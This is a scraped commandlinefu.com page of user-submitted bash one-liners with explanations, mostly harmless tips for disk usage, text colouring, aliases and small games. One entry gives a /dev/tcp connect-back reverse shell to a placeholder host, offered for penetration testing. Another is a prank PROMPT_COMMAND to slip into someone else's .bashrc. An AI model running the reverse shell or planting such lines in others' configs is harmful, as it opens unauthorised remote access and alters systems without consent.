Hide

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again.

Delete that bloated snippets file you've been using and share your personal repository with the world. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.


If you have a new feature suggestion or find a bug, please get in touch via http://commandlinefu.uservoice.com/

Get involved!

You can sign-in using OpenID credentials, or register a traditional username and password.

First-time OpenID users will be automatically assigned a username which can be changed after signing in.

Hide

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for:

Hide

News

2011-03-12 - Confoo 2011 presentation
Slides are available from the commandlinefu presentation at Confoo 2011: http://presentations.codeinthehole.com/confoo2011/
2011-01-04 - Moderation now required for new commands
To try and put and end to the spamming, new commands require moderation before they will appear on the site.
2010-12-27 - Apologies for not banning the trolls sooner
Have been away from the interwebs over Christmas. Will be more vigilant henceforth.
2010-09-24 - OAuth and pagination problems fixed
Apologies for the delay in getting Twitter's OAuth supported. Annoying pagination gremlin also fixed.
Hide

Tags

Hide

Functions

Commands tagged bash from sorted by
Terminal - Commands tagged bash - 715 results
cat *.txt >output.txt
ls | grep *.txt | while read file; do cat $file >> ./output.txt; done;
alias head='head -n $((${LINES:-`tput lines 2>/dev/null||echo -n 12`} - 2))'
26

Run the alias command, then issue

ps aux | head

and resize your terminal window (putty/console/hyperterm/xterm/etc) then issue the same command and you'll understand.

${LINES:-`tput lines 2>/dev/null||echo -n 12`}

Insructs the shell that if LINES is not set or null to use the output from `tput lines` ( ncurses based terminal access ) to get the number of lines in your terminal. But furthermore, in case that doesn't work either, it will default to using the deafault of 12 (-2 = 10).

The default for HEAD is to output the first 10 lines, this alias changes the default to output the first x lines instead, where x is the number of lines currently displayed on your terminal - 2. The -2 is there so that the top line displayed is the command you ran that used HEAD, ie the prompt.

Depending on whether your PS1 and/or PROMPT_COMMAND output more than 1 line (mine is 3) you will want to increase from -2. So with my prompt being the following, I need -7, or - 5 if I only want to display the commandline at the top. ( http://www.askapache.com/linux-unix/bash-power-prompt.html )

275MB/748MB

[7995:7993 - 0:186] 06:26:49 Thu Apr 08 [askapache@n1-backbone5:/dev/pts/0 +1] ~

In most shells the LINES variable is created automatically at login and updated when the terminal is resized (28 linux, 23/20 others for SIGWINCH) to contain the number of vertical lines that can fit in your terminal window. Because the alias doesn't hard-code the current LINES but relys on the $LINES variable, this is a dynamic alias that will always work on a tty device.

hb(){ sed "s/\($*\)/`tput setaf 2;tput setab 0;tput blink`\1`tput sgr0`/gI"; }
2010-04-07 08:45:26
User: AskApache
Functions: sed
-2
hb(){ sed "s/\($*\)/`tput setaf 2;tput setab 0;tput blink`\1`tput sgr0`/gI"; }

hb blinks, hc does a reverse color with background.. both very nice.

hc(){ sed "s/\($*\)/`tput setaf 0;tput setab 6`\1`tput sgr0`/gI"; }

Run this:

command ps -Hacl -F S -A f | hc ".*$PPID.*" | hb ".*$$.*"

Your welcome ;)

From my bash profile - http://www.askapache.com/linux-unix/bash_profile-functions-advanced-shell.html

date +%A | cut -c $(( $(date +%A | wc -c) - 1 ))
2010-04-07 00:23:15
User: DaveQB
Functions: cut date wc
Tags: bash echo cut date wc
0

A command to find out what the day ends in. Can be edited slightly to find out what "any" output ends in.

NB: I haven't tested with weird and wonderful output.

function ends_in_y() { case $(date +%A) in *y ) true ;; * ) false ;; esac } ; ends_in_y && echo ok
2010-04-06 22:18:52
Functions: date echo false true
-1

The shell has perfectly adequate pattern matching for simple expressions.

function ends_in_y() { if [ `date +%A | sed -e 's/\(^.*\)\(.$\)/\2/'` == "y" ]; then echo 1; else echo 0; fi }
2010-04-06 20:14:34
User: allrightname
Functions: echo sed
-3

For those days when you need to know if something is happening because the day ends in "y".

du -cks * | sort -rn | while read size fname; do for unit in k M G T P E Z Y; do if [ $size -lt 1024 ]; then echo -e "${size}${unit}\t${fname}"; break; fi; size=$((size/1024)); done; done
wget randomfunfacts.com -O - 2>/dev/null | grep \<strong\> | sed "s;^.*<i>\(.*\)</i>.*$;\1;" | while read FUNFACT; do notify-send -t $((1000+300*`echo -n $FUNFACT | wc -w`)) -i gtk-dialog-info "RandomFunFact" "$FUNFACT"; done
2010-04-02 09:43:32
User: mtron
Functions: grep read sed wc wget
2

extension to tali713's random fact generator. It takes the output & sends it to notify-osd. Display time is proportional to the lengh of the fact.

PROMPT_COMMAND='if [ $RANDOM -le 3200 ]; then printf "\0337\033[%d;%dH\033[4%dm \033[m\0338" $((RANDOM%LINES+1)) $((RANDOM%COLUMNS+1)) $((RANDOM%8)); fi'
2010-04-01 06:52:32
User: hotdog003
Functions: printf
Tags: bash
24

Add this to a fiend's .bashrc.

PROMPT_COMMAND will run just before a prompt is drawn.

RANDOM will be between 0 and 32768; in this case, it'll run about 1/10th of the time.

\033 is the escape character. I'll call it \e for short.

\e7 -- save cursor position.

\e[%d;%dH -- move cursor to absolute position

\e[4%dm \e[m -- draw a random color at that point

\e8 -- restore position.

find . -type d -name '*[A-Z]*' -execdir bash -c '! test -f "$(echo "$0" | tr "[:upper:]" "[:lower:]")"' {} \; -execdir bash -c 'mv "$0" "$(echo "$0" | tr "[:upper:]" "[:lower:]")"' {} \;
while $8;do read n;[ $n = "$l" ]&&c=$(($c+1))||c=0;echo $c;l=$n;done
2010-03-31 00:41:08
User: florian
Functions: read
Tags: bash read Game
1

hold period (or whatever character) and hit enter after a second. You need to make the next line of periods the same length as the previous line... score starts at 0 and increase each time length of line is same.

wget randomfunfacts.com -O - 2>/dev/null | grep \<strong\> | sed "s;^.*<i>\(.*\)</i>.*$;\1;"
2010-03-30 23:49:30
User: tali713
Functions: grep sed wget
13

Though without infinite time and knowledge of how the site will be designed in the future this may stop working, it still will serve as a simple straight forward starting point.

This uses the observation that the only item marked as strong on the page is the single logical line that includes the italicized fact.

If future revisions of the page show failure, or intermittent failure, one may simply alter the above to read.

wget randomfunfacts.com -O - 2>/dev/null | tee lastfact | grep \<strong\> | sed "s;^.*<i>\(.*\)</i>.*$;\1;"

The file lastfact, can then be examined whenever the command fails.

du -kd | egrep -v "/.*/" | sort -n
2010-03-30 15:40:35
User: rmbjr60
Functions: du egrep sort
-1

Thanks for the submit! My alternative produces summaries only for directories. The original post additionally lists all files in the current directory. Sometimes the files, they just clutter up the output. Once the big directory is located, *then* worry about which file(s) are consuming so much space.

count="1" ; while true ; do read next ; if [[ "$next" = "$last" ]] ; then count=$(($count+1)) ; echo "$count" ; else count="1" ; echo $count ; fi ; last="$next" ; done
2010-03-30 04:02:29
User: dabom
Functions: echo read true
Tags: bash read Game
8

Really bored during class so I made this...

Basically, you hold period (or whatever) and hit enter after a second and you need to make the next line of periods the same length as the previous line...

My record was 5 lines of the same length.

It's best if you do it one handed with your pointer on period and ring on enter.

find ${PATH//:/ } -iname "*admin*" -executable -type f
2010-03-29 10:20:07
User: sanmiguel
Functions: find
Tags: bash find unix
1

While it seems (to me at least) a little counter-intuitive to filter on name first, this requires less work for find, as it allows it to immediately discount any files that do not match the name directly from the directory listing on disk. Querying against file attributes requires reading the file attributes, which is performed for all files matching any name based predicates.

svn stat -u | sort | sed -e "s/^M.*/\o033[31m&\o033[0m/" -e "s/^A.*/\o033[34m&\o033[0m/" -e "s/^D.*/\o033[35m&\o033[0m/"
2010-03-26 15:44:04
Functions: sed sort stat
Tags: bash svn sed
1

Use color escape sequences and sed to colorize the output of svn stat -u.

Colors: http://www.faqs.org/docs/abs/HTML/colorizing.html

svn stat characters: http://svnbook.red-bean.com/en/1.4/svn-book.html#svn.ref.svn.c.status

GNU Extensions for Escapes in Regular Expressions: http://www.gnu.org/software/sed/manual/html_node/Escapes.html

alias dush="du -sm *|sort -n|tail"
2010-03-26 10:18:57
User: funky
Functions: alias
28

sorts the files by integer megabytes, which should be enough to (interactively) find the space wasters. Now you can

dush

for the above output,

dush -n 3

for only the 3 biggest files and so on. It's always a good idea to have this line in your .profile or .bashrc

printf ${PATH//:/\\n}
ls -d $(echo ${PATH//:/ }) > /dev/null
if [ "$(ping -q -c1 google.com)" ];then wget -mnd -q http://www.google.com/intl/en_ALL/images/logo.gif ;fi
2010-03-23 04:15:03
User: alf
Functions: wget
-1

Bash scrip to test if a server is up, you can use this before wget'ing a file to make sure a blank one isn't downloaded.

find . -type f -name '*.mp3' -execdir mp3gain -a '{}' +
2010-03-21 22:23:44
Functions: find
1

This normalizes volume in your mp3 library, but uses mp3gain's "album" mode. This applies a gain change to all files from each directory (which are presumed to be from the same album) - so their volume relative to one another is changed, while the average album volume is normalized. This is done because if one track from an album is quieter or louder than the others, it was probably meant to be that way.

find /dev/ -name random -exec bash -c '[ -r $0 -a -w $0 ] && dd if=$0 | sort | dd of=$0' {} \;
exec 0</dev/tcp/hostname/port; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
2010-03-18 17:25:08
User: truemilk
Functions: exec
2

Connect-back shell using Bash built-ins. Useful in a web app penetration test, if it's the case of a locked down environment, without the need for file uploads or a writable directory.

--

/dev/tcp and /dev/udb redirects must be enabled at compile time in Bash.

Most Linux distros enable this feature by default but at least Debian is known to disable it.

--

http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

echo $(( `ulimit -u` - `find /proc -maxdepth 1 \( -user $USER -o -group $GROUPNAME \) -type d|wc -l` ))
2010-03-12 08:42:49
User: AskApache
Functions: echo wc
1

There is a limit to how many processes you can run at the same time for each user, especially with web hosts. If the maximum # of processes for your user is 200, then the following sets OPTIMUM_P to 100.

OPTIMUM_P=$(( (`ulimit -u` - `find /proc -maxdepth 1 \( -user $USER -o -group $GROUPNAME \) -type d|wc -l`) / 2 ))

This is very useful in scripts because this is such a fast low-resource-intensive (compared to ps, who, lsof, etc) way to determine how many processes are currently running for whichever user. The number of currently running processes is subtracted from the high limit setup for the account (see limits.conf, pam, initscript).

An easy to understand example- this searches the current directory for shell scripts, and runs up to 100 'file' commands at the same time, greatly speeding up the command.

find . -type f | xargs -P $OPTIMUM_P -iFNAME file FNAME | sed -n '/shell script text/p'

I am using it in my http://www.askapache.com/linux-unix/bash_profile-functions-advanced-shell.html especially for the xargs command. Xargs has a -P option that lets you specify how many processes to run at the same time. For instance if you have 1000 urls in a text file and wanted to download all of them fast with curl, you could download 100 at a time (check ps output on a separate [pt]ty for proof) like this:

cat url-list.txt | xargs -I '{}' -P $OPTIMUM_P curl -O '{}'

I like to do things as fast as possible on my servers. I have several types of servers and hosting environments, some with very restrictive jail shells with 20processes limit, some with 200, some with 8000, so for the jailed shells my xargs -P10 would kill my shell or dump core. Using the above I can set the -P value dynamically, so xargs always works, like this.

cat url-list.txt | xargs -I '{}' -P $OPTIMUM_P curl -O '{}'

If you were building a process-killer (very common for cheap hosting) this would also be handy.

Note that if you are only allowed 20 or so processes, you should just use -P1 with xargs.